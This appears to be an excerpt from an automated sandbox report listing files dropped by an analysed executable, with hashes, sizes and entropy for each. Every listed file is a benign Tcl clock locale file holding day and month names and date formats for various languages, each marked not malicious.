                                                                                                                                                                                                                              SSDEEP:12:4EnLB383VYmxWHWog4QUbxMmAMMiGZu+3v6ay/GK3vZsSVn:4aR83VYsxonQ2MmVVGRvjCGsvGSV
                                                                                                                                                                                                                              MD5:D8BBEC2F8935054E6081BB5E4AE8F7E3
                                                                                                                                                                                                                              SHA1:33FE6D51A284B8760BC6F442329B10374F506BDA
                                                                                                                                                                                                                              SHA-256:7DBC4E82D82FDE8CDF522FA10E082289D46B0C1A4A7D7A5FA83FF116677F052B
                                                                                                                                                                                                                              SHA-512:BF39C75DD6B3625897D7D44AC253AF5656CA21D0B394F78611584E2606CBC419C4A02353542D23393BEBCCF0CB4D861CDECD61AD89339F78C0260E966B495777
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mt DAYS_OF_WEEK_ABBREV [list \.. "\u0126ad"\.. "Tne"\.. "Tli"\.. "Erb"\.. "\u0126am"\.. "\u0120im"].. ::msgcat::mcset mt MONTHS_ABBREV [list \.. "Jan"\.. "Fra"\.. "Mar"\.. "Apr"\.. "Mej"\.. "\u0120un"\.. "Lul"\.. "Awi"\.. "Set"\.. "Ott"\.. "Nov"].. ::msgcat::mcset mt BCE "QK".. ::msgcat::mcset mt CE "".. ::msgcat::mcset mt DATE_FORMAT "%A, %e ta %B, %Y".. ::msgcat::mcset mt TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset mt DATE_TIME_FORMAT "%A, %e ta %B, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1209
                                                                                                                                                                                                                              Entropy (8bit):4.313626715960843
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83B0tSYuZrIsmYmPAxyIQ4HU92W16EL3Tvav31:43qhuZrIPAt04yTcF
                                                                                                                                                                                                                              MD5:42D02C3CAF28BE4994F27CEF5A183AB7
                                                                                                                                                                                                                              SHA1:DC411E8AC12C3D588AB2F3A3C95A75D8689AD402
                                                                                                                                                                                                                              SHA-256:534C5DACEF12F818FAF4ED806997A559F95D591F1B6236B0C30B07A107DD13F3
                                                                                                                                                                                                                              SHA-512:0BE27572106324FE2B6CDFF4513500DE7582AD1ABEF451FFC62B2050D3875A149DDDB66451E1B3F5BA9216268E9998D2A1C1E8343BBB9EF97947DA054B82818E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nb DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset nb DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset nb MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nb MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nb BC
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1129
                                                                                                                                                                                                                              Entropy (8bit):4.235969198645435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR837Ed+RxRMZZsmUmnZAEEHM92WFU5vtrvs:43AAHRMZZPnZALsCtt7s
                                                                                                                                                                                                                              MD5:B9B949794203D204628D4DBEA29587AE
                                                                                                                                                                                                                              SHA1:1642D8040144469B5C359E80693E68036F87B849
                                                                                                                                                                                                                              SHA-256:9E2FE3851CF13EC79A9B10A09B01CEB0A26044AE0DC90A4E00BE57745E854C79
                                                                                                                                                                                                                              SHA-512:0CCCCF6D61423CEE0389C3BA1A8E94F2B092C53465D1937F5595AF91E46DD38B318D6C7EE3D88B89F32BFB952C0D55E0E67B46D7DF306ECA6690E283ADEB2CB9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl DAYS_OF_WEEK_ABBREV [list \.. "zo"\.. "ma"\.. "di"\.. "wo"\.. "do"\.. "vr"\.. "za"].. ::msgcat::mcset nl DAYS_OF_WEEK_FULL [list \.. "zondag"\.. "maandag"\.. "dinsdag"\.. "woensdag"\.. "donderdag"\.. "vrijdag"\.. "zaterdag"].. ::msgcat::mcset nl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mrt"\.. "apr"\.. "mei"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset nl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "maart"\.. "april"\.. "mei"\.. "juni"\.. "juli"\.. "augustus"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset nl DATE_FORM
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.865165930946383
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xo4gPPdjog9X3vLjog9X3v6mjo49+3vnFDoAkvn:4EnLB3835gHdPF3vjF3v64I3v9dmn
                                                                                                                                                                                                                              MD5:3261F397ED0291368FF1881E7BA08ECE
                                                                                                                                                                                                                              SHA1:7147ABB62034EB152B1FED9246A533535F07372C
                                                                                                                                                                                                                              SHA-256:77A69DD60D171B321512B14794E75A66FF753410C007997B310790D86E09B057
                                                                                                                                                                                                                              SHA-512:C1526F454FA594DAD056B056F76F01D8B2AB713D04EB2A3643416B8E741B248CC94E000BAEE5B0F60436B88B1216FB1DE7F7C3FA456D4A4FBDE24F97C3B739B8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl_BE DATE_FORMAT "%d-%m-%y".. ::msgcat::mcset nl_BE TIME_FORMAT "%T".. ::msgcat::mcset nl_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset nl_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1200
                                                                                                                                                                                                                              Entropy (8bit):4.282788574144479
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83tCtrJwuQrIsmYmLAxyIQ4HU92W1W4/3Hv+v31:434suQrILAt0EafIF
                                                                                                                                                                                                                              MD5:985E97517C2BF37719A618F575DF392C
                                                                                                                                                                                                                              SHA1:65BC07FC3A955300ED09B7485F90AEC18CBAD43F
                                                                                                                                                                                                                              SHA-256:06FA2D6D8C59D0B8EAC2EDE5AB0DDB8B6E095D1A023B1966FCE3B65916FA14FB
                                                                                                                                                                                                                              SHA-512:75BC14DBAD147A98D32D2AF0BE0BE50F115BB9C3BBE283B53977B9F264A055734B30F6B1C4EEE9686F1874D178C535111731C92D495B7D370FB17213B65C9A40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nn DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "m\u00e5"\.. "ty"\.. "on"\.. "to"\.. "fr"\.. "lau"].. ::msgcat::mcset nn DAYS_OF_WEEK_FULL [list \.. "sundag"\.. "m\u00e5ndag"\.. "tysdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "laurdag"].. ::msgcat::mcset nn MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nn MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nn BCE "f.Kr."
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1263
                                                                                                                                                                                                                              Entropy (8bit):4.459506202908786
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83lUj0ORGgIzdW6RDYKG7FwRc0ypvOvX:43+HMg2W6RDYnFwRc0ydYX
                                                                                                                                                                                                                              MD5:79AB7C13AA3833A1DAEADDB1144CCE55
                                                                                                                                                                                                                              SHA1:C01ABC2F16549CAEC6B081448B2CBA88A680E250
                                                                                                                                                                                                                              SHA-256:61462C325DB0065352D8155307F949869862A86CAC67AD7BB6703F57A7FA2FF3
                                                                                                                                                                                                                              SHA-512:79EB696164FDDD9B121558C2780E54E295FF2DC4D8E87A0DE507B4F2925612721A98FF5010199CB68CF894ACA7A07884E9E02F3DC1E078D241431E3DC884C0A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pl DAYS_OF_WEEK_ABBREV [list \.. "N"\.. "Pn"\.. "Wt"\.. "\u015ar"\.. "Cz"\.. "Pt"\.. "So"].. ::msgcat::mcset pl DAYS_OF_WEEK_FULL [list \.. "niedziela"\.. "poniedzia\u0142ek"\.. "wtorek"\.. "\u015broda"\.. "czwartek"\.. "pi\u0105tek"\.. "sobota"].. ::msgcat::mcset pl MONTHS_ABBREV [list \.. "sty"\.. "lut"\.. "mar"\.. "kwi"\.. "maj"\.. "cze"\.. "lip"\.. "sie"\.. "wrz"\.. "pa\u017a"\.. "lis"\.. "gru"\.. ""].. ::msgcat::mcset pl MONTHS_FULL [list \.. "stycze\u0144"\.. "luty"\.. "marzec"\.. "kwiecie\u0144"\.. "maj"\.. "czerwiec"\.. "lipiec"\.. "sierpie\u0144"\.. "wrzesie\u0144"\.. "pa\u017adziernik"\.. "listopad"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1177
                                                                                                                                                                                                                              Entropy (8bit):4.394980756969744
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83CYkjBc1yHYJt//0/I31YMY47flV7YaqgCyt9Fo8g6Gtvt76svi:43C5LHcNnxJ9Ltg6Gpt76Ki
                                                                                                                                                                                                                              MD5:8F53B3571DD29E12BD33349CFA32F28F
                                                                                                                                                                                                                              SHA1:C125E059B8BFE5FECD482D1A1DA50B8678872BF6
                                                                                                                                                                                                                              SHA-256:6F6EEEDDCF232BDCB952592A144810CED44A1CBB4BCC2C062D5F98D441505380
                                                                                                                                                                                                                              SHA-512:5CD7E7097B720E5399795126A71348816CBA697FD8F14160779E982ADAB00D5994978E2F9445785B0DE62F6F14232278AD1A65BC53730CA58D676B057F0BC406
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Seg"\.. "Ter"\.. "Qua"\.. "Qui"\.. "Sex"\.. "S\u00e1b"].. ::msgcat::mcset pt DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Segunda-feira"\.. "Ter\u00e7a-feira"\.. "Quarta-feira"\.. "Quinta-feira"\.. "Sexta-feira"\.. "S\u00e1bado"].. ::msgcat::mcset pt MONTHS_ABBREV [list \.. "Jan"\.. "Fev"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset pt MONTHS_FULL [list \.. "Janeiro"\.. "Fevereiro"\.. "Mar\u00e7o"\.. "Abril"\.. "Maio"\.. "Junho"\.. "Julho"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Dezembro"
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):286
                                                                                                                                                                                                                              Entropy (8bit):4.8608779725401785
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xofm6GPWWjofAW3vLjofAW3v6mjofm6T+3vnFDoAkvn:4EnLB383+NGdg93vk93v6fNK3v9dmn
                                                                                                                                                                                                                              MD5:A2626EA95C2480FEA68906AE6A1F6993
                                                                                                                                                                                                                              SHA1:A0592902337C00FC2E70B1DFB3A42453A86535BB
                                                                                                                                                                                                                              SHA-256:320BE7D5B730091E6FA35F196314737261C8E154577DCF6AC8C2057D44394AD7
                                                                                                                                                                                                                              SHA-512:9801A87D024565676D4F3EAF0702C213E59FC2B6719D8BE95C19C9ED53FC43487F65F5408378B401A2B4C2BD4E2E391C2D848CA87739A6082AB7766EC6B9EFE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt_BR DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset pt_BR TIME_FORMAT "%T".. ::msgcat::mcset pt_BR TIME_FORMAT_12 "%T".. ::msgcat::mcset pt_BR DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1224
                                                                                                                                                                                                                              Entropy (8bit):4.350784108088039
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83coPUMSeZmkTMm41icpK+7ZVoImEcVUCWdvHvWIn:43lPHFmkm1iMVoxEc+CWZPWIn
                                                                                                                                                                                                                              MD5:F6575EC17966320106FF7ABDFB3186E2
                                                                                                                                                                                                                              SHA1:68C6B72D664FDA27450FCE8B5734AB627CE825D7
                                                                                                                                                                                                                              SHA-256:25ED6AC7A353E23B954B98611AE3B7E56BDCF2B0CB0DB358253CFB8BEBBB831C
                                                                                                                                                                                                                              SHA-512:E564543231922A17C898419545BFA65E5E31FE9F005FDD201B735CFDE08E96FB3B98349C2A7959E29CA8F7E6934B0C4C6DE6B5E67209D0DD9A7746DFEBF037B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ro DAYS_OF_WEEK_ABBREV [list \.. "D"\.. "L"\.. "Ma"\.. "Mi"\.. "J"\.. "V"\.. "S"].. ::msgcat::mcset ro DAYS_OF_WEEK_FULL [list \.. "duminic\u0103"\.. "luni"\.. "mar\u0163i"\.. "miercuri"\.. "joi"\.. "vineri"\.. "s\u00eemb\u0103t\u0103"].. ::msgcat::mcset ro MONTHS_ABBREV [list \.. "Ian"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mai"\.. "Iun"\.. "Iul"\.. "Aug"\.. "Sep"\.. "Oct"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset ro MONTHS_FULL [list \.. "ianuarie"\.. "februarie"\.. "martie"\.. "aprilie"\.. "mai"\.. "iunie"\.. "iulie"\.. "august"\.. "septembrie"\.. "octombrie"\.. "noiembrie"\.. "decembrie"\.. ""].. ::msgcat:
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2091
                                                                                                                                                                                                                              Entropy (8bit):4.2886524607041006
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43D+pQ7keidQfRQPgQHB81Z/sFIAZSQWQXQrQxJQjQRnQBFQiWftkWt:26pgkeoSnpjA4tMYiJcCMFmVRt
                                                                                                                                                                                                                              MD5:9F1C8DD58550558977821FD500E7C0E0
                                                                                                                                                                                                                              SHA1:EFDD809BC2872A5BE0E353D31BE6D7D72E4B829C
                                                                                                                                                                                                                              SHA-256:BB35BB6F07BAEF72C329EC3E95D6527A2736070EE2FFE5DE227E1FF0332390F8
                                                                                                                                                                                                                              SHA-512:AA3C5C40AE9D342F8287958355C3321CF60566AD3E84E3D18D782FC022A998DA275506A61010A65D2E7D7578F2919C47C63AB0BA63A38800AA48D4B88ACE54D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru DAYS_OF_WEEK_ABBREV [list \.. "\u0412\u0441"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset ru DAYS_OF_WEEK_FULL [list \.. "\u0432\u043e\u0441\u043a\u0440\u0435\u0441\u0435\u043d\u044c\u0435"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440\u0433"\.. "\u043f\u044f\u0442\u043d\u0438\u0446\u0430"\.. "\u0441\u0443\u0431\u0431\u043e\u0442\u0430"].. ::msgcat::mcset ru MONTHS_ABBREV [list \.. "\u044f\u043d\u0432"\.. "\u0444\u0435\u0432"\.. "\u043c\u0430\u0440"\.. "\u0430\u043f\u0440"\.. "\u043c\u0430\u0439"\.. "\u0438\u044e\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):248
                                                                                                                                                                                                                              Entropy (8bit):4.9420431225061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoVAgWIZoVY9X3vtfNrsoVA9+3vW6Q9vn:4EnLB383SFWIyaX3vtNl/3vWHNn
                                                                                                                                                                                                                              MD5:DC98D88964650E302BE97FDB3B33326E
                                                                                                                                                                                                                              SHA1:1DDDCC4265D7B980B867FEE674BEF2FD87D823F7
                                                                                                                                                                                                                              SHA-256:13E4E79A0ED82034BADE0CFF8DEF5DE1222F6968108AD710662BDB7DAF36D7E1
                                                                                                                                                                                                                              SHA-512:F3B9D528C529DD520FEDA3C20ED354E521C5B3C29F3317E15B7939CE06A3D67554D34DD6E54FE038585E46C560C604A1FD7E7F84914086B5994D52CE2C9E99CE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru_UA DATE_FORMAT "%d.%m.%Y".. ::msgcat::mcset ru_UA TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset ru_UA DATE_TIME_FORMAT "%d.%m.%Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1212
                                                                                                                                                                                                                              Entropy (8bit):4.359036493565628
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83/YIXo4YY0dD6kMm7fX2NaSIvZdHZgHZ/IxvaGWxvtl9svWTN:43rLTR44/yWltOWB
                                                                                                                                                                                                                              MD5:E297221FA73BD78577B398BC7D061D21
                                                                                                                                                                                                                              SHA1:F2A6B456272F913A9E97C495CEE73AC774C90FA1
                                                                                                                                                                                                                              SHA-256:E65D6E5E837DF0A2DF0DB77BCE45334BBC27EFFF9023C37119E75D49932D9D6C
                                                                                                                                                                                                                              SHA-512:AB9DDAE7CB21193C7753041F0B88CF2D40987E7E604B47816219458D217F084AA4EBF36719E22AAB3FD71A271D9F956ADC353182991903D7ADE8C8F00F6B2F9B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sh DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Uto"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sub"].. ::msgcat::mcset sh DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljak"\.. "Utorak"\.. "Sreda"\.. "\u010cetvrtak"\.. "Petak"\.. "Subota"].. ::msgcat::mcset sh MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maj"\.. "Jun"\.. "Jul"\.. "Avg"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset sh MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "Mart"\.. "April"\.. "Maj"\.. "Juni"\.. "Juli"\.. "Avgust"\.. "Septembar"\.. "Oktobar"\.. "Novembar"\.. "Decembar"\.. ""].. ::msgcat::mcset sh BC
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1255
                                                                                                                                                                                                                              Entropy (8bit):4.4043119723436135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83c46o40u3rIsmJIcm93ApLDVb2IcU95WFGEXF3eUCvtz/v3e6:43c3ow3rF93Ap7tEXFREtznp
                                                                                                                                                                                                                              MD5:24DA40901D907D35195CC1B3A675EBC7
                                                                                                                                                                                                                              SHA1:8AF31248F06FADA5CFB0D83A940CFF5CE70E2577
                                                                                                                                                                                                                              SHA-256:976813F6C53C9BEBBF976B0F560FD7FC5E4EC4C574D7E1CD31F9A4056765CB7A
                                                                                                                                                                                                                              SHA-512:A9BC6AAFE9AEEDFD1E483E54A2D27871A09ADD6807D8F90410CD2BB82A91BA9DF435652EC9A7C3AD0A080D7F153CA848BB47DAD3936BA30E4AEFF3C474C433CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sk DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "Ut"\.. "St"\.. "\u0160t"\.. "Pa"\.. "So"].. ::msgcat::mcset sk DAYS_OF_WEEK_FULL [list \.. "Nede\u013ee"\.. "Pondelok"\.. "Utorok"\.. "Streda"\.. "\u0160tvrtok"\.. "Piatok"\.. "Sobota"].. ::msgcat::mcset sk MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sk MONTHS_FULL [list \.. "janu\u00e1r"\.. "febru\u00e1r"\.. "marec"\.. "apr\u00edl"\.. "m\u00e1j"\.. "j\u00fan"\.. "j\u00fal"\.. "august"\.. "september"\.. "okt\u00f3ber"\.. "november"\.. "decem
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                                                                              Entropy (8bit):4.333705818952628
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83MIXpC9opYuGS/BrIsmZ5hv1yAxyIVjd392WFThENvt0vJoO:43fXYujZrqyApYJtyR
                                                                                                                                                                                                                              MD5:CB76F54CBE0D1AAE8BA956B4C51CBD2A
                                                                                                                                                                                                                              SHA1:C1F78375EDB0BD2504553E33B2024C0C63FDB1B2
                                                                                                                                                                                                                              SHA-256:11A6264676DBED87E4F718075127E32E107854F35F141642454F484984084486
                                                                                                                                                                                                                              SHA-512:69964348FF08DE6EEB5E3DD61057FF0DF5441105EB7BEE7FB7E9AC5E26DCC164E3C7C011CA5CD7BC5B97A7872532331C97CCBC80563F6C5A3548014BFA8BEF16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sl DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Tor"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sob"].. ::msgcat::mcset sl DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljek"\.. "Torek"\.. "Sreda"\.. "\u010cetrtek"\.. "Petek"\.. "Sobota"].. ::msgcat::mcset sl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "avg"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sl MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marec"\.. "april"\.. "maj"\.. "junij"\.. "julij"\.. "avgust"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset sl B
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1321
                                                                                                                                                                                                                              Entropy (8bit):4.408176575111904
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83F7ONQEwXwjjTlVoSEh76W/X+WZQJ4hv+H6v2V:43NwjPEwl4VQ8q
                                                                                                                                                                                                                              MD5:E606F620F03EC0FBDBE6551601299C5F
                                                                                                                                                                                                                              SHA1:0B50AB679E8D90D8E7319BCADAC426E004594D3B
                                                                                                                                                                                                                              SHA-256:1F4EFD78F6B45B65F73F09B2F52FC13C2A7C4138DCB7664804878D197B6EBDF9
                                                                                                                                                                                                                              SHA-512:08AF2B51EB7111E334ADDA3A03F9A8816C104E9742B523EC363FB5131A3DF73D298A8DDCD573D23C23C65CCFD2B8898DF75AE3D4F04BF80744044FB6BAB5EC0A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
